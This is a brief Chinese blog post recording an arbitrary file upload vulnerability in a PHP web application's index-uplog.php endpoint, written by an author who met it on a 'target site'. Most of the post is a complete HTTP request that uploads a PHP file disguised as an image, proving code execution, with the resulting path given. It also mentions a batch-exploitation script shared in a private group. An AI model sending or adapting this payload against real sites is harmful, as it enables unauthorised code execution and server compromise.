很久之前就研究过这个洞 到现在都忘了 今天在目标站遇见了就记录下来吧

Payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST /source/pack/upload/index-uplog.php HTTP/1.1
Host: 127.0.0.1
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWa8hDK6XlSEJhi7
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 322

------WebKitFormBoundaryZWa8hDK6XlSEJhi7
Content-Disposition: form-data; name="app"; filename="funny.php"
Content-Type: image/jpeg

<?php phpinfo();;unlink(__FILE__);?>
------WebKitFormBoundaryZWa8hDK6XlSEJhi7
Content-Disposition: form-data; name="time"

test //这是文件名
------WebKitFormBoundaryZWa8hDK6XlSEJhi7--

go后会在 /data/tmp/ 下生成 test.php 文件

批量脚本就不放了 有兴趣可以一起进星球交流